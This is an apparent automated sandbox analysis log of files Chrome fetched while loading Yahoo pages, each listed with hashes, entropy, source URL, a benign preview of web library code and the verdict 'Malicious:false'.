                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>. <html lang="en-us"><head>. <meta http-equiv="content-type" content="text/html; charset=UTF-8">. <meta charset="utf-8">. <title>Yahoo</title>. <meta name="viewport" content="width=device-width,initial-scale=1,minimal-ui">. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">. <style>. html {. height: 100%;. }. body {. background: #fafafc url(https://s.yimg.com/nn/img/sad-panda-201402200631.png) 50% 50%;. background-size: cover;. height: 100%;. text-align: center;. font: 300 18px "helvetica neue", helvetica, verdana, tahoma, arial, sans-serif;. }. table {. height: 100%;. width: 100%;. table-layout: fixed;. border-collapse: collapse;. border-spacing: 0;. border: none;. }. h1 {. font-size: 42px;. font-weight: 400;. color: #400090;. }. p {. color: #1A1A1A;. }. #message-1 {. font-weight: bold;. margin: 0;. }. #message-2 {. display:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (20681)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):20920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.382951729807628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:W4Oh1nYxEHnaDSA9O3gcXpe62Oaqz66VSwyKTWf6S6hYrJBq91D:Wtewg6dcOWyS66I
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F4BA31A6A1D636440EB73ADA2C312201
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:92A49D852D46B7E66DB1679014C692589D9803D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:596842C18CBF89B94E83E196E6B2A68DC4899B568C4129E2930C00797B8CC65C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6ADB18F26D737F5AC85EE1D35757DA9352A859C6766D4CB345B500EDB3AFDD3589EE2696526BE1008AE65E0E08EC590459ECA2E85F1E652FA54336AD9BD4BBAF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*!. * protobuf.js v7.1.0 (c) 2016, daniel wirtz. * compiled thu, 22 sep 2022 17:16:11 utc. * licensed under the bsd-3-clause license. * see: https://github.com/dcodeio/protobuf.js for details. */.!function(d){"use strict";!function(r,u,t){var n=function t(n){var i=u[n];return i||r[n][0].call(i=u[n]={exports:{}},t,i,i.exports),i.exports}(t[0]);n.util.global.protobuf=n,"function"==typeof define&&define.amd&&define(["long"],function(t){return t&&t.isLong&&(n.util.Long=t,n.configure()),n}),"object"==typeof module&&module&&module.exports&&(module.exports=n)}({1:[function(t,n,i){n.exports=function(t,n){var i=Array(arguments.length-1),e=0,r=2,s=!0;for(;r<arguments.length;)i[e++]=arguments[r++];return new Promise(function(r,u){i[e]=function(t){if(s)if(s=!1,t)u(t);else{for(var n=Array(arguments.length-1),i=0;i<n.length;)n[i++]=arguments[i];r.apply(null,n)}};try{t.apply(n||null,i)}catch(t){s&&(s=!1,u(t))}})}},{}],2:[function(t,n,i){i.length=function(t){var n=t.length;if(!n)return 0;for(var i=0;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8356), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.15591255297827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:36umTu6tHB4ba+++/ERFSOqbFgTtuSd00u5L9r+AjKFZQTrq:31mi6BBSa+ZBbyRuSd00u5rK4rq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A9DF8E56A02208BEACF0DED260DD1D62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8F6AC2F62923D566B1C369DE93FB005A37EB6757
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:10A01F1F787157623EC546EC8105DBA5CAF08B5719667B91EA1449056254D7B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FB29746BF1C080FFA52DCA91E0B27757D604404B4E3753656980801FFCC6E8F3FFD5CDD6D4E1236F85F1BD47765D068EFB8C92DD44EF7BC2D8742DB8ED00D3A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-menu",[],t):"object"==typeof exports?exports["wafer-menu"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-menu"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var n={};return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,n){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (47261)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):47262
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3974731018213795
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (12433), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.202182615598781
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:3cmi6DAQ/946S4Y4+A09psvNYh8EhatYwQ:MTYxRY46psvNYh+Q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9EC69A2055C595F415EADE096A476B0D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:472B77037C2765E09666F43CCFBC01EF40783571
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4F06D94CB6038F42F5C8D59D369AB21C3C54643A544B0824582CB00EBB61DFB8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EC87EFA9D26546AD67D9CB65932AF47D8FBA77D0298E1567E2A11DB679BE045C761C3A6ADC131CC44BDBC7D95C522982FA9EE9F221155BB1FD2E38864E25EC3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-toggle-1.15.4-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-toggle",[],t):"object"==typeof exports?exports["wafer-toggle"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-toggle"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var o=r[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (10606)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):10608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.462416140261641
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:oPB97G1R8idwlmT8twy8i7JlmM8twl9vMVB85i86eBEONNQVW2YvLYhxLywTLSiz:oz7G1RUm1ydmQlpGeBEOLLYDLyD0dE8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1F28EA994BB180901B846EFC53D023A8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BFD5A6581B5F5578EB7B0E594FED13A74F7F3E9F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CD0CB4C9D8F0E8ACA257490C82CFA36348535602C5A58D8FDB0A23C2A6A8BD8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D7AD0C046BA43051F067C654BE5B55B6AF1D4562C4249CC6CEAD268BA2F3245418B4B8A8453BF4695F93900F3B795D02208CE2E80A01C7EDF021E622389A27B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Footer.CKND0cCh.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as De,A as Me,e as S,b as P,t as G,d as L,f as V,j as C,h as K,i as $,q as F,B as fe,L as ce,k as N,l as E,x as oe,y as ue,n as we,K as X,p as _e,m as se}from"./scheduler.Dsuh-FKt.js";import{S as ye,i as Se,c as Q,b as B,m as R,t as p,g as Y,e as q,a as I,d as U}from"./index.CvwOawEI.js";import{e as H,u as Le,o as Ve}from"./each.CI2tb2RB.js";import{g as Ne}from"./spread.CgU5AtxT.js";import{t as j,m as Pe,g as te,H as Ce,s as Oe,I as Ae}from"./commonUtil.BWwawKjd.js";import{L as x}from"./Link.vSNQugO0.js";import{L as Fe,P as Te}from"./Logo.bXT7R7fN.js";import{S as He}from"./SocialIcon.DKAjwa0M.js";import{C as Qe}from"./CDS.DMTRQPpt.js";function he(n,e,t){const o=n.slice();return o[14]=e[t],o[16]=t,o}function me(n,e,t){const o=n.slice();return o[14]=e[t],o}function ge(n,e,t){const o=n.slice();return o[14]=e[t],o}function de(n,e,t){const o=n.slice();return o[21]=e[t],o}function Be(n){let e,t;return e=new Fe({props:{width:"182",height:"25.5"}}),{c(){Q(e.$$.fragment)},l(o){B(e.$$.f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (15264)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.53729719471769
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:uQTCfjv99mW+911+Fl0YD0Dew/X2q5ulRIUeT:uQTCfGZ1+Fj9w/XuuT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E2202E6ED6EF52CEC2C4A875C99225BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FD48D3157CFA6B6E6FEC3E50787E357AA3288C88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F2CFBD195DFF011843F93E2D32979F6F07926211CBF3EDDDC3B708B0BB04C8A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4E2AEFD87D89F4D5C00CFCAC8EE2D7748F84979BE9E66272475A621A19BA8FC884737DF604B3B7344FE4EB0C1154819880BC3769E25798BB4ABDDEF76EDC9B4F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/* @preserve. * $Id: rawdeflate.js,v 0.3 2009/03/01 19:05:05 dankogai Exp dankogai $. *. * Original:. * http://www.onicos.com/staff/iz/amuse/javascript/expert/deflate.txt. */./* @preserve. * Copyright (C) 1999 Masanao Izumo <iz@onicos.co.jp>. * Version: 1.0.1. * LastModified: Dec 25 1999. */./**. * @preserve This code contains an altered version of the original source and is not meant to misrepresent the original software.. */.function base64(r){if("undefined"!=typeof btoa)return btoa(r);for(var t,e,n,f,o,i,a,l="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",u=[],s=0;r.length>s;)t=r.charCodeAt(s++),e=r.charCodeAt(s++),n=r.charCodeAt(s++),f=t>>2,o=(3&t)<<4|e>>4,i=(15&e)<<2|n>>6,a=63&n,isNaN(e)?i=a=64:isNaN(n)&&(a=64),u.push(l.charAt(f)+l.charAt(o)+l.charAt(i)+l.charAt(a));return u.join("")}function lzw_encode(r){for(var t,e={},n=(r+"").split(""),f=[],o=n[0],i=256,a=n.length,l=1;a>l;l++)t=n[l],null!=e[o+t]?o+=t:(f.push(o.length>1?e[o]:o.charCodeAt(0)),e[o+t]=i,i++,o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (7531)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.360245185826988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:PaiF7rzzTpLh7tWKhp4MWKGOocCZlY5v8wF0pNhq:PJF7PzTpLpAnMkOJCZlY5v8wFp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:441B76FCD9406E7AC5C039ACE2271A80
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5018F6D57D1EB033D6FA77CB656903BF7145C3A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9EFC164DF0752A10606FD94119335CC30DFA1E15ACC6BB09E635D84EAA9FAB6C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:21FF4153CB5CD9CC0E4ABB6EE4201E93C7DDBBBAEF2D9D344DC2A7A08A4CF80D01F4AF24AC16BBE95598B2E6A1D9B5D824026B2DCE6FF493C1D7490588DDE7F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/RMP.G38kzltP.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as ae,p as h,b as M,w as re,i as w,j as O,l as K,k as C,x as Q,y as ce,e as oe,d as ne,q as F,H as P,z,A as _e,f as he,B as S,C as ue,c as me,u as de,g as pe,a as be,n as V}from"./scheduler.Dsuh-FKt.js";import{S as ke,i as we,g as ge,a as G,e as ye,t as J}from"./index.CvwOawEI.js";import{g as je}from"./globals.D0QH3NT1.js";import{e as U}from"./each.CI2tb2RB.js";import{g as ve}from"./spread.CgU5AtxT.js";import{g as Ne}from"./commonUtil.BWwawKjd.js";const{document:T}=je;function X(o,l,s){const t=o.slice();return t[13]=l[s],t}function Y(o,l,s){const t=o.slice();return t[16]=l[s],t}function Z(o){let l,s;return{c(){l=oe("link"),this.h()},l(t){l=ne(t,"LINK",{href:!0,rel:!0}),this.h()},h(){F(l,"href",s=typeof o[16]=="string"?o[16]:o[16].value),F(l,"rel","stylesheet")},m(t,e){C(t,l,e)},p(t,e){e&8&&s!==(s=typeof t[16]=="string"?t[16]:t[16].value)&&F(l,"href",s)},d(t){t&&w(l)}}}function A(o){let l,s=o[0].js+"",t;return{c(){l=new P(!1),t=h(),this.h()},l(e){l=z(e,!1),t=h(),this.h()},h(){l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):125962
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.812580646184063
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:vFx+nq3r+b0Fx+XJnr+bGFx++xbr+bwFx+KXbKr+bS:90qh05D020H
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:835A3FF5554CF2F50ADD955382893A9B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:80C0A75AC0F67B5AAFF78B2984515F24D0FDA66E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:00A043D4981DF7ED28C0B88B4714D02E348FC5EECE2406DCFAD0492A55AB7F3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:091177889E5A4EE355D40286B622195768C7B7FE43E48A3E84B859EB270D3D8768937B6A3994823D78C98587E07BA9D670396393D3182C2B7FCE2BB352982783
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://securepubads.g.doubleclick.net/gampad/ads?pvsid=3478411438996106&correlator=2098711035967007&eid=31087349&output=ldjh&gdfp_req=1&vrg=202409240101&ptt=17&impl=fifs&gdpr=0&us_privacy=1YNN&gpp_sid=-1&iu_parts=22888152279%2Cus%2Cyhp%2Cmain%2Cdt%2Cus_yhp_main_dt_top_right%2Cus_yhp_main_dt_top_center%2Cus_yhp_main_dt_as_mid_right_a%2Cus_yhp_main_dt_as_mid_right_b&enc_prev_ius=%2F0%2F1%2F2%2F3%2F4%2F5%2C%2F0%2F1%2F2%2F3%2F4%2F6%2C%2F0%2F1%2F2%2F3%2F4%2F7%2C%2F0%2F1%2F2%2F3%2F4%2F8&prev_iu_szs=300x250%7C300x600%2C970x250%7C3x1%7C728x90%2C300x250%2C300x250&ifi=1&sfv=1-0-40&fsfs=1%2C1%2C1%2C1&fsbs=1%2C1%2C1%2C1&eri=5&sc=1&cookie_enabled=1&abxe=1&dt=1727716874857&adxs=951%2C147%2C951%2C951&adys=1172%2C209%2C2285%2C2035&biw=1263&bih=907&scr_x=0&scr_y=0&btvi=1%7C0%7C2%7C3&ucis=1%7C2%7C3%7C4&oid=2&u_his=2&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&u_tz=-240&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&url=https%3A%2F%2Fwww.yahoo.com%2F&ref=https%3A%2F%2Fhfj.rontishet.ru%2F&vis=1&psz=292x2541%7C1280x270%7C300x540%7C300x540&msz=292x600%7C1280x270%7C300x250%7C300x0&fws=4%2C2052%2C132%2C132&ohw=1263%2C1263%2C300%2C300&td=1&egid=1261&topics=1&tps=1&htps=10&nt=1&psd=WzE1LFtdLG51bGwsM10.&dlt=1727716854808&idt=8298&prev_scp=loc%3Dtop_right%7Cloc%3Dtop_center%7Cloc%3Dmid_right_a%7Cloc%3Dmid_right_b&cust_params=bucket%3D900%252Cseamless%26cobrand%3Dnone%26colo%3Dbf1%26device%3Ddesktop%26lang%3Den-US%26lu%3D0%26region%3DUS%26site%3Dfp%26ver%3Dmegastrm%26usercountry%3DUS%26pt%3Dhome%26spaceid%3D2023538075%26yrid%3D1pa4ckpjflnfm%26bka%3D0%26ay_floor_g%3Dmodel%2520not%2520loaded%26ay_floor_m%3Dmodel%2520not%2520loaded%26ay_floor_s%3Dmodel%2520not%2520loaded%26hb_uid_mod%3Dliveintentid_on_not_enriched%26li-module-enabled%3Dt1-e0%26lr_env%3Dno-id&adks=1481106528%2C3690920304%2C3064630007%2C3845938001&frm=20&eoidce=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"/22888152279/us/yhp/main/dt/us_yhp_main_dt_top_right":["html",1,null,null,1,250,300,0,0,null,null,1,1,[["ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw",1761412876,"/","yahoo.com",1],["UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw",1761412876,"/","yahoo.com",2]],[138472893867],[6692884752],[5335252228],[3455142215],null,null,null,null,null,null,null,1,null,null,null,null,null,null,"AOrYGsnMhvg6tFIFITQWoYvLRm8aBmzlJZfGOzQQ8XT5KeBplSlezJ59jpFPG0hvynVPkaK0pfolD3IozmzKvkB9A0IQEEvW2_E2REK3AnOtwzjzew95","CNef2_WW64gDFb2Hgwcdr2Ic9w",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"1",null,null,null,null,null,null,null,null,null,null,null,"AA-V4qNoLCJESIXj7iP7gM4yCv9beHwvUA8UDmvZ1dCNCRCFtXy93aXJvcYacMnAnvqE079mTCLpSkk",null,null,1,null,null,null,[["ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy",1743268876,"/","yahoo.com"]],[]]}.<!doctype html><html><head></head><b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):121193
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.374612673753393
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:koN+7UOS+mMZo+VqISgLZ2twTMQVr8DQRkIdkIdIZgJadMJbsTrCYk:k2+7MsUB3k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9F93E9A136ACFD22959FEB5E3E1E12C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC5956A417DE9507455085D091811D17B4D3A742
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C14A33EDA9DEA61F335E34AA57A3ABA9803641161669B08B6176D0C4D92C8BC1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:CB9FADF3A5316594931358DC4EF6656DAB81AB3F51927850DB98BE6C765C157C5174F425AB78CB9610DCB1D770F91CA0B27A03ED5F3D9A905C3992A640CF103A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/oa/consent-1.0.383.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see consent-1.0.383.js.LICENSE.txt */.!function(){var e={6848:function(e,n,t){var o,i,a;!function(s){"use strict";if(null!=n&&"number"!=typeof n.nodeType)e.exports=s();else if(null!=t.amdO)i=[],void 0===(a="function"==typeof(o=s)?o.apply(n,i):o)||(e.exports=a);else{var r=s(),c="undefined"!=typeof self?self:$.global;"function"!=typeof c.btoa&&(c.btoa=r.btoa),"function"!=typeof c.atob&&(c.atob=r.atob)}}((function(){"use strict";var e="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";function n(e){this.message=e}return n.prototype=new Error,n.prototype.name="InvalidCharacterError",{btoa:function(t){for(var o,i,a=String(t),s=0,r=e,c="";a.charAt(0|s)||(r="=",s%1);c+=r.charAt(63&o>>8-s%1*8)){if((i=a.charCodeAt(s+=3/4))>255)throw new n("'btoa' failed: The string to be encoded contains characters outside of the Latin1 range.");o=o<<8|i}return c},atob:function(t){var o=String(t).replace(/[=]+$/,"");if(o.length%4==1)throw new n("'atob' failed:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3666), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.122712688435668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:3hqjg8q1Mrsq1YrAw1Ld6UeCiyhq2WeptkcIL:3aumsu6AaLTc2en
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9FBA2531FFA6CB0B4D3D34C56C295495
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0EC8BCC9D8F8360CB279D78F88BBEE001AB95D30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C6D2343A147111E4F3881E468FACC72DA4582C6AAEFF475D3371DF3FA2576BEE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BB6DC985ED5E343DB802BF07F7AF4A92BCB6788AA1F4ACBF61BB49DCFB2926C1E6CF6B1BC31544CBB98BD22D3688D2B220992CD9BED1F2E4FB43ADE8AE33F78E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-bind-1.1.3-modern.js
